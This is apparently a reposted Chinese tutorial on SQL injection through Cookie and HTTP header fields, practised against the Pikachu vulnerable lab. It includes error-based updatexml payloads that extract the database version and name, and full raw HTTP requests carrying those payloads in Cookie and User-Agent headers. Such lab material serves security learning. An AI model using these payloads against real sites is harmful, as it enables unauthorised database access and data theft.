当前位置: 首页 > article >正文

SQL注入漏洞之 提交方式类型注入 Get分类 Post分类 Cookie分类 请求数据位置分类 请求行 请求头 请求数据分类 靶场练习

目录

提交方式分类注入

是什么提交方式(PHP)

Cookie注入

语句

案例

SQL注入请求数据位置分类

在User-Agent输入

错误注入语句

案例

http注入存在于请求头中

Host注入

Referer注入


提交方式分类注入

  1. Get分类

  2. Post分类

  3. Cookie分类


是什么提交方式(PHP)

  • 开发后台 程序员就做好了代码的限制

  • 这下面就存在cookie注入点

  • 取值方式代码原理的解释

ASP:request (全部接受)
request.querystring (接受get)
request.form (接受post)
request.cookie cookie (接受cookie)

$_REQUEST(全部接受)
$_GET 
$_POST (接受post)
$_COOKIE(接受cookie) 

  • #$_GET不是取get请求携带的数据
  • 而是取得查询参数数据其他语言,看开发框架,不同的框架
  • 提取http请求数据的写法或者说函数不同

$_GET 只要URL上面有参数都可以取出参数 
$_POST 只能接受Post上面的数据 
$_REQUEST(全部接受)这个安全性就有很大的问题 

 

python django -- mvc -- request.GET requset.POST request.body

Cookie注入

  • 这里是错误注入的效果:

  • 使用错误语句进行操作

  • 用常规语句是无法看到是注入后的效果

语句

' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #;
  • 用 ' or 1=1# 看不出效果

案例

Cookie: ant[uname]=admin' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=edknf8j8tvgriv3oe0vis1ojq7
GET /pikachu/vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.6/pikachu/vul/sqli/sqli_header/sqli_header_login.php
Connection: close
Cookie: ant[uname]=admin' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=f1n45l5rga2i4og596mmlfr315
Upgrade-Insecure-Requests: 1
Priority: u=0, i


SQL注入请求数据位置分类

  • 请求行

  • 请求头

  • 请求数据分类

  • php专门取请求头数据的

    • 使用的方法是 $_SERVER['请求头键'] 就能拿到值只要服务端取出了请求头相关字段和数据库去打交到了

    • 那么我们就可以获取到数据库的相关数据信息


在User-Agent输入

payload Mozilla' or updatexml(1,concat(0x7e,database()),0) or '

' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #;

错误注入语句

or updatexml(1,concat(0x7e,database()),0) or '

案例

GET /pikachu/vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: 192.168.1.6
User-Agent: payload Mozilla' or updatexml(1,concat(0x7e,database()),0) or '
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.6/pikachu/vul/sqli/sqli_header/sqli_header_login.php
Connection: close
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=f1n45l5rga2i4og596mmlfr315
Upgrade-Insecure-Requests: 1
Priority: u=0, i

http注入存在于请求头中

  • Host注入

  • Referer注入

  • 基本上通过 and 1=2 and 1=1 来进行判断注入点


喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。


http://www.kler.cn/a/524114.html

相关文章:

  • MySQL备忘录
  • 【单细胞第二节:单细胞示例数据分析-GSE218208】
  • 【python】subprocess.Popen执行adb shell指令进入linux系统后连续使用指令,出现cmd窗口阻塞问题
  • MySQL分表自动化创建的实现方案(存储过程、事件调度器)
  • 【xcode 16.2】升级xcode后mac端flutter版的sentry报错
  • 【数据结构】空间复杂度
  • 【Leetcode刷题记录】45. 跳跃游戏 II--贪心算法
  • 【算法】经典博弈论问题——斐波那契博弈 + Zeckendorf 定理 python
  • 中文输入法方案
  • CH32V303RCT6使用RTOS的选择对比
  • 深入理解 C 语言函数指针的高级用法:(void (*) (void *)) _IO_funlockfile
  • 对游戏宣发的粗浅思考
  • LabVIEW开发故障诊断
  • 虚幻基础06:cast to
  • 讲解QoS队列调度算法
  • 【算法应用】基于A*-蚁群算法求解无人机城市多任务点配送路径问题
  • 用HTML、CSS和JavaScript实现庆祝2025蛇年大吉(附源码)
  • A星算法两元障碍物矩阵转化为rrt算法四元障碍物矩阵
  • SIPp的使用-SIPp的教程
  • INCOSE需求编写指南-第4节:需求和要求陈述以及需求和要求集的规则
  • 【Leetcode 每日一题】119. 杨辉三角 II
  • 06_改善播放效果--优先级与阻塞
  • Java定时任务实现方案(五)——时间轮
  • C++基础(1)
  • 处理 .gitignore 未忽略文件夹问题
  • 我的2024年终总结和2025年展望